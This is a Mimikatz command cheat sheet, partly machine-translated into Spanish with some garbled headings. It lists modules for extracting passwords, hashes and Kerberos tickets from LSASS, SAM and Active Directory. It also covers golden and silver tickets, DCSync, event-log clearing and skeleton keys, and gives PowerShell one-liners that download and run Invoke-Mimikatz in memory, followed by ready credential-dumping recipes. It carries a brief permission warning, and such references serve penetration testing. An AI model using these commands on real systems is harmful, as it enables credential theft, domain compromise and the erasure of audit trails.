Mimikatz es una poderosa herramienta de dumping y manipulación credencial desarrollada por Benjamin Delpy (@gentilkiwi). Puede extraer contraseñas de texto claro, hashes, códigos PIN y tickets de Kerberos de memoria, así como realizar varios ataques como pasar-el-hash, pasar-el-ticket, y la creación de boletos de oro.
NOVEDAD Advertencia: Mimikatz es una herramienta de pruebas de seguridad que se puede utilizar malintencionadamente. Úsalo en ambientes donde tienes permiso explícito para hacerlo.
Obtención de Mimikatz
Repositorio oficial
GitHub.
Última publicación: [_URL_1___)
Binarios precompilados
mimikatz.exe - 32-bit ejecutable
mimikatz_trunk.zip - Contiene ejecutables de 32 bits y 64 bits
Compilation from Source
git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build
Uso básico
Corriendo Mimikatz
# Run directly
mimikatz.exe
# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Privilegios elevados
privilege::debug
Obtener ayuda
help
<module>::
<module>::<command> /?
Exiting Mimikatz
exit
Módulos y comandos básicos
sekurlsa Module (LSASS Memory Access)
Command
Description
sekurlsa::logonpasswords
Extract all logon passwords
sekurlsa::tickets
Extract Kerberos tickets
sekurlsa::ekeys
Extract Kerberos encryption keys
sekurlsa::dpapi
Extract DPAPI master keys
sekurlsa::credman
Extract credentials from Windows Credential Manager
sekurlsa::msv
Extract MSV authentication information
sekurlsa::tspkg
Extract TSPKG authentication information
sekurlsa::wdigest
Extract WDigest authentication information
sekurlsa::kerberos
Extract Kerberos authentication information
sekurlsa::ssp
Extract SSP authentication information
sekurlsa::livessp
Extract LiveSSP authentication information
sekurlsa::cloudap
Extract CloudAP authentication information
Módulo de bomba (SAM y Active Directory)
Command
Description
lsadump::sam
Extract hashes from the SAM database
lsadump::secrets
Extract LSA secrets
lsadump::cache
Extract cached domain credentials
lsadump::dcsync
Perform DCSync attack to retrieve password data
lsadump::lsa
Extract LSA secrets
lsadump::trust
Extract domain trust keys
lsadump::backupkeys
Extract domain backup keys
Módulo kerberos (Manipulación de bolsillo)
Command
Description
kerberos::list
List all Kerberos tickets
kerberos::purge
Purge all Kerberos tickets
kerberos::ptt
Pass-the-ticket (inject a ticket)
kerberos::golden
Create a golden ticket
kerberos::silver
Create a silver ticket
kerberos::tgt
Create a TGT
kerberos::hash
Calculate Kerberos keys from password
Módulo crypto (Operaciones Criptográficas)
Command
Description
crypto::certificates
List certificates
crypto::keys
List keys
crypto::system
List system certificates
crypto::capi
List CAPI certificates
crypto::cng
List CNG certificates
crypto::stores
List certificate stores
Módulo de bóveda (Windows Vault Access)
Command
Description
vault::cred
List credentials in Windows Vault
vault::list
List vault credentials
token Module (Token Manipulation)
Command
Description
token::whoami
Display current token information
token::list
List all tokens
token::elevate
Elevate token privileges
token::revert
Revert token
token::run
Run a process with a token
(Privilege Management)
Command
Description
privilege::debug
Enable debug privilege
privilege::driver
Load a driver
módulo de evento (Event Log Management)
Command
Description
event::clear
Clear event logs
event::drop
Drop event logs
ts Module (Terminal Services)
Command
Description
ts::sessions
List terminal services sessions
ts::multirdp
Enable multiple RDP sessions
misc Module (Miscellaneous)
Command
Description
misc::cmd
Command prompt
misc::regedit
Registry editor
misc::taskmgr
Task manager
misc::ncroutemon
Network connection route monitor
misc::detours
Detours detection
misc::skeleton
Install skeleton key
Técnicas de ataque comunes
Credencial Dumping
Extract Logon Passwords
privilege::debug
sekurlsa::logonpasswords
Extracto de las credenciales de SAM
privilege::debug
token::elevate
lsadump::sam
Extract Cached Domain Credenciales
privilege::debug
lsadump::cache
Extract from LSASS Dump
# Create dump with Task Manager or procdump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords